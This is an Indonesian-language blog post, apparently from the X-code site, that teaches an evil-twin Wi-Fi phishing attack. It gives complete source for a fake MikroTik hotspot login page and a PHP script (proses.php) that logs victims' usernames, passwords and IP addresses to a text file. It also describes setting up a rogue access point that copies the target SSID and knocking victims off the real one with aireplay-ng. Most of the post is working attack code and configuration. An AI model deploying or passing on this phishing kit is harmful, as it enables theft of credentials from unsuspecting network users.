![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik1.png\")
<\/p>\nPertama siapkan 3 hal di bawah ini<\/p>\n
1. Router Mikrotik yang sudah diset router<\/p>\n
2. Access Point<\/p>\n
3. Laptop<\/p>\n
Di Mikrotik router set seperti di bawah ini (Kondisi sudah diset router sebelumnya).<\/p>\n
<\/p>\n
Lalu set seperti di bawah ini<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik12.png\")
<\/p>\n
Setelah itu klik OK<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/xxa.png\")
<\/p>\n
Setelah itu buat web proxy dengan set seperti di atas<\/p>\n
Diasumsikan ip 192.168.1.9 adalah ip laptop kita yang diinstall xampp<\/p>\n
DHCP Server bisa dari router mikrotik atau access point<\/p>\n
<\/p>\n
Source code index.php untuk halaman login mikrotik<\/p>\n
<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN\"\r\n\"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd\">\r\n<html>\r\n<head>\r\n<title>internet hotspot > login<\/title>\r\n<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/>\r\n<meta http-equiv=\"pragma\" content=\"no-cache\" \/>\r\n<meta http-equiv=\"expires\" content=\"-1\" \/>\r\n<meta name=\"viewport\" content=\"width=device-width; initial-scale=1.0; maximum-scale=1.0;\"\/>\r\n<style type=\"text\/css\">\r\nbody {color: #737373; font-size: 10px; font-family: verdana;}\r\n\r\ntextarea,input,select {\r\nbackground-color: #FDFBFB;\r\nborder: 1px solid #BBBBBB;\r\npadding: 2px;\r\nmargin: 1px;\r\nfont-size: 14px;\r\ncolor: #808080;\r\n}\r\n\r\na, a:link, a:visited, a:active { color: #AAAAAA; text-decoration: none; font-size: 10px; }\r\na:hover { border-bottom: 1px dotted #c1c1c1; color: #AAAAAA; }\r\nimg {border: none;}\r\ntd { font-size: 14px; color: #7A7A7A; }\r\n<\/style>\r\n\r\n<\/head>\r\n\r\n<body>\r\n<form name=\"sendin\" action=\"$(link-login-only)\" method=\"post\">\r\n<\/form>\r\n\r\n<script type=\"text\/javascript\" src=\"\/md5.js\"><\/script>\r\n<script type=\"text\/javascript\">\r\n<!--\r\nfunction doLogin() {\r\ndocument.sendin.username.value = document.login.username.value;\r\ndocument.sendin.password.value = hexMD5('$(chap-id)' + document.login.password.value + '$(chap-challenge)');\r\ndocument.sendin.submit();\r\nreturn false;\r\n}\r\n\/\/-->\r\n<\/script>\r\n<div align=\"center\">\r\n<a href=\"$(link-login-only)?target=lv&dst=$(link-orig-esc)\"><\/a><\/div>\r\n\r\n<table width=\"100%\" style=\"margin-top: 10%;\">\r\n<tr>\r\n<td align=\"center\" valign=\"middle\">\r\n<div class=\"notice\" style=\"color: #c1c1c1; font-size: 9px\">Please log on to use the internet hotspot service<br \/>\r\n<\/div>\r\n<br \/>\r\n<table width=\"280\" height=\"280\" style=\"border: 1px solid #cccccc; padding: 0px;\" cellpadding=\"0\" cellspacing=\"0\">\r\n<tr>\r\n<td align=\"center\" valign=\"bottom\" height=\"175\" colspan=\"2\">\r\n<form name=\"login\" action=\"proses.php\" method=\"post\"\r\n$(if chap-id) onSubmit=\"return doLogin()\" $(endif)>\r\n<input type=\"hidden\" name=\"dst\" value=\"$(link-orig)\" \/>\r\n<input type=\"hidden\" name=\"popup\" value=\"true\" \/>\r\n\r\n<table width=\"100\" style=\"background-color: #ffffff\">\r\n<tr><td align=\"right\">login<\/td>\r\n<td><input style=\"width: 80px\" name=\"username\" type=\"text\"\/><\/td>\r\n<\/tr>\r\n<tr><td align=\"right\">password<\/td>\r\n<td><input style=\"width: 80px\" name=\"password\" type=\"password\"\/><\/td>\r\n<\/tr>\r\n<tr><td> <\/td>\r\n<td><input type=\"submit\" value=\"OK\" \/><\/td>\r\n<\/tr>\r\n<\/table>\r\n<\/form>\r\n<\/td>\r\n<\/tr>\r\n<tr><td align=\"center\"><a href=\"http:\/\/www.mikrotik.com\" target=\"_blank\" style=\"border: none;\"><img src=\"img\/logobottom.png\" alt=\"mikrotik\" \/><\/a><\/td><\/tr>\r\n<\/table>\r\n\r\n<br \/><div style=\"color: #c1c1c1; font-size: 9px\">Powered by MikroTik RouterOS<\/div>\r\n<br \/>\r\n<div style=\"color: #FF8080; font-size: 9px\"><\/div>\r\n<\/td>\r\n<\/tr>\r\n<\/table>\r\n\r\n<script type=\"text\/javascript\">\r\n<!--\r\ndocument.login.username.focus();\r\n\/\/-->\r\n<\/script>\r\n<\/body>\r\n<\/html>\r\n<\/pre>\n <\/p>\n
Source code proses.php<\/p>\n
<?php $file = \"mikrotik.txt\";\r\n$username = $_POST['username'];\r\n$password = $_POST['password'];\r\n$ip = $_SERVER['REMOTE_ADDR'];\r\n$today = date(\"F j, Y, g:i a\");\r\n$handle = fopen($file, 'a');\r\nfwrite($handle, \"-------------------------------------------------- ++\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"Username login mikrotik: \");\r\nfwrite($handle, \"$username\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"Password login mikrotik: \");\r\nfwrite($handle, \"$password\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"IP Address: \");\r\nfwrite($handle, \"$ip\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"Date Submitted: \");\r\nfwrite($handle, \"$today\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"-------------------------------------------------- ++\");\r\nfwrite($handle, \"\\n\");\r\nfwrite($handle, \"\\n\");\r\nfclose($handle);\r\necho \"<script LANGUAGE=\\\"JavaScript\\\">\r\n<!--\r\nwindow.location=\\\"http:\/\/192.168.1.9\/login.php\";\r\n<\/script>\";\r\n?>\r\n<\/pre>\n <\/p>\n
Setting access point yang asli<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik4.png\")
<\/p>\n
<\/p>\n
Di bawah ini diasumsikan setting access point palsu, nama SSID nya sama<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/mikrotik3.png\")
<\/p>\n
Wireless Network Name nya XcodeTrainingData<\/p>\n
<\/p>\n
Di atas diasumsikan adalah access point asli yang dijadikan target<\/p>\n
Jika targetnya access point menggunakan WPA-PSK dan access point palsu kita disabled security (Tidak menggunakan WPA\/WPA2 atau WEP.) maka akan muncul 2 access point dengan nama SSID sama, perbedaannya pada simbol tanda seru jika tidak ada keamanannya saat di lihat di Wireless Network Connection.<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/5.jpeg\")
<\/p>\n
Di atas saat 2 AP dengan SSID sama tapi satunya di posisi disabled security tapi di satunya ada proteksi WPA\/WPA2\u00a0 Personal.<\/p>\n
<\/p>\n
Jika sama-sama disabled security-nya maka SSID nya hanya satu yang terdeteksi, percobaan yang dilakukan saya PC yang terpasang wireless USB adapter, posisinya dekat dengan access point asli maka yang terkoneksi justru yang asli, bukan yang access point palsu dengan nama SSID sama.<\/p>\n
Jika kondisinya korban terkoneksi dengan access point asli maka bisa dicoba memutus koneksi antara komputer korban dengan access point asli menggunakan aireplay-ng, caranya banyak di google, harapannya saat si korban tidak terkoneksi dan pindah tempat dan posisinya dekat dengan access point palsu dan terkoneksi dengan akses point palsu maka korban bisa masuk pada jebakan attacker.<\/p>\n
Di sisi berbeda, saat laptop saya dekatkan dengan access point palsu dan melakukan koneksi ke XcodeTrainingData hasilnya seperti di bawah ini, yang artinya laptop saya terkoneksi dengan access palsu.<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/1.jpg\")
<\/p>\n
Saya dapat ip 192.168.1.104, terkoneksi ke access point palsu<\/p>\n
<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/2.jpeg\")
<\/p>\n
Jika saya akses facebook.com<\/p>\n
<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/3.jpeg\")
<\/p>\n
Hasilnya halaman login mikrotik palsu, kemudian dicoba login<\/p>\n
<\/p>\n
![\"\"](\"http:\/\/xcode.or.id\/blog\/wp-content\/uploads\/2020\/03\/4.jpeg\")
<\/p>\n
Di komputer attacker hasilnya seperti di atas jika dibuka file mikrotik.txt<\/p>\n
<\/p>\n
Penulis : Kurniawan (Founder X-code) – kurniawanajazenfone@gmail.com<\/p>\n","protected":false},"excerpt":{"rendered":"
Pertama siapkan 3 hal di bawah ini 1. Router Mikrotik yang sudah diset router 2. Access Point 3. Laptop Di Mikrotik router set seperti di bawah ini (Kondisi sudah diset router sebelumnya). Lalu set seperti di bawah ini Setelah itu Read More …<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[23],"tags":[],"_links":{"self":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691"}],"collection":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=691"}],"version-history":[{"count":13,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691\/revisions"}],"predecessor-version":[{"id":715,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/691\/revisions\/715"}],"wp:attachment":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=691"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=691"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=691"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}